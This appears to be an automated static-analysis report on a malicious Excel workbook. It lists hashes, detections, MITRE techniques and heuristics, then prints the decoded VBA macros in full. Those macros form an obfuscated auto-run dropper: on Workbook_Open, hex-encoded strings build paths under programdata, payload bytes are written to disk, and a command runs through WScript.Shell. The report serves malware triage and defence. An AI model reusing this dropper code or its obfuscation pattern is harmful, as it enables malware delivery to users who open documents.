Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 662c3b181467a9d2…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 2.81 MB
Created: 2020-01-28 11:18:08
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: b95e2ec3d72c65dd9495b633a1dbc906
SHA-1: cd5c349091d297b669e01ad8c6d69ced1d9bd89e
SHA-256: 662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553
Risk Score: 332

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including a Workbook_Open auto-execution routine. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to download and execute a second-stage payload. The presence of 'macros.bas' further supports this. The exact payload and delivery mechanism are not fully discernible due to obfuscation, leading to an 'unknown family' classification.

Heuristics (10)

  • ClamAV: Xls.Dropper.Agent-7584490-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7584490-0
  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim Entrop As Object
        Set Entrop = CreateObject("WScript.Shell")
        Dim SetProp As Object
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Dim Entrop As Object
        Set Entrop = CreateObject("WScript.Shell")
        Dim SetProp As Object
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim Entrop As Object
        Set Entrop = CreateObject("WScript.Shell")
        Dim SetProp As Object
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
        Attribute VB_Customizable = True
        Private Sub Workbook_Open()
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/iX/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/pdf/1.3/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10489 bytes
SHA-256: 39a0411b4f8efaa180c3c6adcf0d037ebf418aacb343650aa0e95b9e82520844
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) 'For 64 Bit Systems
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) 'For 32 Bit Systems
#End If



Function HitcherDasm(ByVal bStatus As Boolean) As Boolean
  Dim lActiveFlag As Long
  Dim lRetval      As Long

  lActiveFlag = IIf(bStatus, 1, 0)
  lRetval = SystemParametersInfo(SPI_SETSCREENSAVEACTIVE, lActiveFlag, 0, 0)
  
  If lRetval > 0 Then
    EnableScreenSaver = True
  Else
    EnableScreenSaver = False
  End If

End Function

Sub BelowRadar()

    With Selection.Borders(xlInconsistentListFormula)
        .LineStyle = xlContinuous
        .ColorIndex = 1
        .TintAndShade = 1
        .Weight = xl3DArea
    End With

    With Selection.Borders(xl3ArrowsGray)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 1
        .Weight = xlThin
    End With





End Sub

Public Function HexToString(ByVal HexToStr As String) As String
Dim strTemp   As String
Dim strReturn As String
Dim i         As Long
    For i = 1 To Len(HexToStr) Step 2
        strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
        strReturn = strReturn & strTemp
    Next i
    HexToString = strReturn
End Function

Sub Telemarketing(ByVal one As String, ByVal second As String, ByVal third As String, ByVal Oses As String)
'Sub Telemarketing(ByVal one As String, ByVal second As String, ByVal third As String)
    
    Dim final_path_file As String
    Dim what_name  As String
    Dim unpress_all  As Variant
    Dim field_dir  As Variant
    Dim numberings() As Byte
    Dim sum As String
    sum_all = one & second & third
    Dim linecounts() As String
    Dim Entrop As Object
    Set Entrop = CreateObject("WScript.Shell")
    Dim SetProp As Object
    Set SetProp = CreateObject("WScript.Shell")
    Dim KelProp As Object
    Set KelProp = CreateObject("WScript.Shell")
    
    what_name = Split(HexToString("6d6e7470657266216265617574796265617374"), "!")(0)
    what_name2 = Split(HexToString("73797374656d69646c6570657266216265617574796265617374"), "!")(0)
    field_dir = Split(HexToString("633a5c70726f6772616d64617461216265617574796265617374"), "!")(0) & Split(HexToString("5c73797374656d69646c65706572665c21626575617479"), "!")(0)
    If Dir(field_dir, vbDirectory) = "" Then
        MkDir (field_dir)
    End If
    Dim sub_str() As String
    Dim sub_str_couple As String
    Dim si As String
    
    Dim DistributedSense1() As Byte
    Dim DistributedSense2() As Byte
    Dim DistributedSense3() As Byte
    Dim DistributedSense4() As Byte
    
    si = HexToString("5c")
    
    unpress_all = field_dir & what_name2 & Split(HexToString("2e6173746572696b212e7a6970"), "!")(1)
    
    final_path_file = field_dir & Split(HexToString("626573746f652173797374656d69646c6570657266216265617374"), "!")(1) & Split(HexToString("2e6f7869212e766273"), "!")(1)
    sub_str = Split(final_path_file, "\")
    sub_str_couple = sub_str(0) & si & sub_str(1) & si & sub_str(2) & si & Split(HexToString("7465726d696e616c732173797374656d69646c65706572662e766273"), "!")(1)
    DistributedSense1 = DistributedSense(UserForm1.TextBox1.Text)
    ran = "Khysper-87789798"
    DistributedSense2 = DistributedSense(UserForm1.TextBox2.Text)
    ran = "Biblu-03209-1209"
    DistributedSense3 = DistributedSense(UserForm1.TextBox3.Text)
    third = "Gypsum-678-23"
    
    second = "Demon-90789-#%$@#"
    Call EntryDispute(unpress_all, DistributedSense1)
    ran = "P!G90er-TreRKl"
    Dim sta As Boolean
    
    ran = "T!lp-6y!nb{"
    Call EntryDispute(sub_str_couple, DistributedSense2)
    ran = "P!53er-Tr341Kl"
    
    Dim Xamarain As String
    Xamarin = field_dir & HexToString("5265616c74696d652e6373")
    Call EntryDispute(Xamarin, DistributedSense3)
    
    ran = sum_all
    Dim FileName As String
    FileName = VBA.FileSystem.Dir(HexToString("433a5c57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b5c76342e302e33303331395c6373632e657865"))
    
    Dim pos As Integer
    Dim ton As Integer
    
    pos = InStr(Oses, "6.02")
    ton = InStr(Oses, ".00")
    If Not (FileName = VBA.Constants.vbNullString) And (pos > 0 Or ton > 0) Then
        ''Dim pola As String
        'Entrop.Run ("wscript " & sub_str_couple), 0, False
        SetProp.Run (HexToString("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")), 0, False
'Handlers:

        'Sleep 4000
        'KelProp.Run (HexToString("636d64202f6320633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f63782e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c783634692e73637222222222")), 0, False

    Else
        'Entrop.Run ("wscript " & sub_str_couple), 0, False
        SetProp.Run (HexToString("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")), 0, False
'Handlers1:
        'Sleep 4000
         'KelProp.Run (HexToString("636d64202f6320633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f632e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c73797374656d69646c65706572662e73637222222222")), 0, False
         'KelProp.Run (HexToString("636d64202f6320633a5c70726f6772616d646174615c73797374656d69646c65706572665c77696e6470726f632e736372202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e73637222222022222222636d642e657865222222222022222222633a5c70726f6772616d646174615c73797374656d69646c65706572665c783634692e73637222222222")), 0, False

    End If
    
End Sub


Sub EntryDispute(ByVal sophi As String, ByRef sequen() As Byte)
Dim ran As String
ran = "P!pper-Tr341Kl"
Open sophi For Binary Access Write As #2
         Put #2, , sequen
Close #2
End Sub






Public Function DistributedSense(ByVal tepet As String) As Byte()
    Dim linecounts() As String
    linecounts = Split(tepet, ",")
    Dim antenna() As Byte
    
    'Dim DistributedSense() As Byte
    
    Dim ptstoval As Double
    
    ptstoval = 0
    
    Dim ran As String
    ran = "Vistro-vstoadd-plugin+234689"
    For Each vl In linecounts
        ReDim Preserve antenna(ptstoval)
        ran = "Vistro-vstoadd-plugin!7470-"
        antenna(ptstoval) = CByte(vl)
        ran = "Vistro-vstoadd-plugin!8989789"
        ptstoval = ptstoval + 1
    Next
    DistributedSense = antenna
End Function


Sub Gypsum()

    With Selection.Borders(xlInconsistentListFormula)
        .LineStyle = xlContinuous
        .ColorIndex = 1
        .TintAndShade = 1
        .Weight = xl3DArea
    End With

    With Selection.Borders(xl3ArrowsGray)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 1
        .Weight = xlThin
    End With





End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
  
  Dim a, b, C
  a = "Balley"
  b = "Tikinto"
  C = "SimSim"
  manu = Application.OperatingSystem
  'Dim Entrop As Object
    'Set Entrop = CreateObject("WScript.Shell")
  'Entrop.Run (HexToString("2222633a5c70726f6772616d646174615c73797374656d69646c65706572665c5265616c74696d652e6578652222202222636d642e6578652222202222633a5c70726f6772616d646174615c73797374656d69646c65706572665c73797374656d69646c65706572662e7363722222"))
  Call Telemarketing(a, b, C, manu)
  'Call Telemarketing(a, b, C)
  Sheet2.Visible = xlSheetVisible
  Sheet2.Copy
 End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8113F3BB-1589-4601-BDE3-F975273FE35E}{1D76BB9E-FDEE-4201-A627-0D4932CB59B8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module2"
Sub sdf()

End Sub

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True